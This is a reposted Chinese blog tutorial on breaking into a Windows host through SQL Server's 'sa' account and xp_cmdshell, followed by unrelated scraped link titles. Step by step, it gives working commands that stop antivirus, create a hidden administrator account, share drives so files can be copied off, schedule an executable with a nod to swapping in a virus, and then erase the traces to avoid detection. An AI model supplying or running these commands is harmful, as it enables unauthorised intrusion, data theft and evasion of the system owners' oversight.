转自:http://blog.sina.com.cn/s/blog_5070b2cd01008blt.html

要***主机IP:192.168.11.56

前提是:

1.对方主机有安装SQL server软件

2.知道sa(SQL的帐号)的密码(一般情况下,的密码为空或是sa)。

开始***:
1.打开自己的sql 客户端查询分析器
  输入192.168.11.56启动对方sql server服务器

2.调用sql server的xp_cmdshell命令

exec xp_cmdshell "net start"                                     注释:查看对方开启的服务,寻找对方有无杀毒软件。

exec xp_cmdshell "net stop savroam"                        注释:savroam为一个杀毒软件进程,这条命令是关闭该进程。

exec  xp_cmdshell "net user test 123456 /add"          注释:在对方主机创建帐户:test  密码:123456

exec  xp_cmdshell "net user "                                     注释:查看对方现有帐户,确认test已经加入。

exec xp_cmdshell "net localgroup administrators test /add"        注释:把test加入管理员组,获得更高权限。

exec  xp_cmdshell "net start server"        开启对方共享服务,如果在第一条命令中有 server 服务,这步可以省。

exec   xp_cmdshell "net share d=d:\"                      注释:把对方D盘共享。

exec  xp_cmdshell "net share test=c:\oracle"                注释:或者只共享C盘下的oracle文件夹,共享名test。
              
exec  xp_cmdshell "at 20:00 c:\qq.exe"       注释:让对方在20点自动开启QQ。如果把QQ换成病毒,呵呵……

3.通过IE进行***

在IE地址栏中输入\\192.168.11.56(对方IP),在对方共享的文件夹中找出你想要的文件进行复制。

4.撤退(清除你的修改,以免被发现。)

xp_cmdshell "net share test /delete"     注释:删除test共享。
xp_cmdshell "net share d /delete"         注释:删除D盘共享。
xp_cmdshell "net share"                  注释: 查看还有哪些共享。
xp_cmdshell "net localgroup administrators test /delete"     注释:让帐号test离开管理员组。
xp_cmdshell "net user test /delete"                         注释:删除test帐号
mdshell "net stop server"                                    注释:停止共享服务
xp_cmdshell "net start savroam"                             注释:开启对方杀毒软件

转载于:https://blog.51cto.com/526869727/1561995

常见SQL Server 2000漏洞及其相关利用2相关推荐

  1. 解决安装SQL Server 2000提示文件挂起的一般方法

    前天,帮项目小组的成员安装SQL Server 2000,遇到文件挂起问题,到网上搜了一下,很快解决了,随后看到更多的解决方法,在此我只是记下一般的解决方法,以便以后使用: 进入regedit注册表, ...

  2. 利用虚拟硬盘(把内存当作硬盘)来提高数据库的效率(目前只针对SQL Server 2000)可以提高很多...

    上一篇:让你的笔记本更快一点--我的笔记本的性能测试和虚拟硬盘(把内存当成硬盘)的使用感觉 虚拟硬盘:就是把内存当作硬盘来用,比如有2G的内存,那么可以拿出来1G的内存当作硬盘来用. 自从知道了&qu ...

  3. 从SQL Server 2000/2005到SQL Server 2008的升级测试

    本文部分内容摘自<SQL Server 2008管理实战>,人民邮电出版社:<深入MSSQL 2008升级和应用程序的兼容性>,IT专家网:<SQL Server 200 ...

  4. Microsoft SQL Server 2000整合规划

    Microsoft SQL Server 2000整合规划 更新日期: 2004年06月24日 SQL Server技术文章 作者:Allan Hirt 投稿人:Tom Davidson和Shaun ...

  5. Oracle 9i与MS SQL Server 2000之比较连载五.zz

    http://kb.cnblogs.com/a/1153156 Oracle 9i与MS SQL Server 2000之比较连载五 2008-04-14 18:13 四.Oracle中新的数据库对象 ...

  6. [翻译] - Inside SQL Server 2000's Memory Management Facilities

    原文地址:Inside SQL Server 2000's Memory Management Facilities     翻译:RicCC Ken Henderson     Microsoft ...

  7. SQL Server 2000+ADO.NET实现并发控制

    2.2 SQL Server 2000+ADO.NET实现并发控制 2.2.1 并发一致性问题 常见并发并发一致性问题包括:丢失的修改.不可重复读.读脏数据.幻影读(幻影读在一些资料中往往与不可重复读 ...

  8. 配置sql server 2000以允许远程访问

    配置sql server 2000以允许远程访问 适合故障: 1. 用sql企业管理器能访问sql server 2000(因为它是采用命名管道(named pipes)方式进行方式),但用ado.n ...

  9. 《MS SQL Server 2000管理员手册》系列——8. 管理 Microsoft SQL Server 服务

    8. 管理 Microsoft SQL Server 服务 SQL Server 服务组件 使用SQL Server服务管理员 使用 Windows 2000 服务控制管理员 使用 SQL Serve ...

最新文章

  1. 如何使用vs来运行box2d中Testbed的案例
  2. 单点登录与权限管理本质:cookie安全问题
  3. 青藏高原地下巨型空间形成原因
  4. java表单上下左右滚动_怎么在网页中实现表格上下左右滚动
  5. 台式计算机的速度,台式电脑运行速度慢怎么处理
  6. 行业看点 | 量子计算时代即将到来?华人科学家揭秘“天使粒子”背后故事……...
  7. 【华为云技术分享】云小课 | 磁盘容量不够用?小课教你来扩容!
  8. 米斯特白帽培训讲义(v2)信息收集
  9. 力扣 数组中的最长山脉
  10. 企业员工人事管理系统(数据库课设)
  11. loT行业生死竞速:Aqara绿米得用户得天下
  12. 不需要解压使用对pdf文件进行压缩
  13. Svn主分支次分支合并和版本回退
  14. 立志做文艺小清新的技术宅
  15. 八种可以简单判断否属于过敏体质的表现,符合四条就是了
  16. 如何通过一封恶意邮件追踪幕后黑客组织
  17. MySQL如何判断日期(datetime)是否是同一天
  18. 使用Jason's Utter Ramblings Repo的yum源出现warning: rpmt
  19. R语言和医学统计学系列(1):t检验
  20. 1分钟为Win10瘦身!把吃掉的硬盘找回来

热门文章

  1. 计算机系统注册表的由来,计算机系统注册表
  2. php的数组key删除,php删除数组的key
  3. python比较文件的修改时间,如何比较python中两个文件的修改日期?
  4. ubuntu12.04 php环境搭建,Ubuntu12.04筹建php开发环境
  5. mysql 自动 分库 备份_MySQL分库备份的方法
  6. java stream 使用局部变量
  7. TensorFlow tf.squeeze
  8. java多对多的存储_Swift CoreData,通过多对多关系保存数据
  9. 2020年中国网络安全市场全景图
  10. 腾讯云认证考试常见问题答疑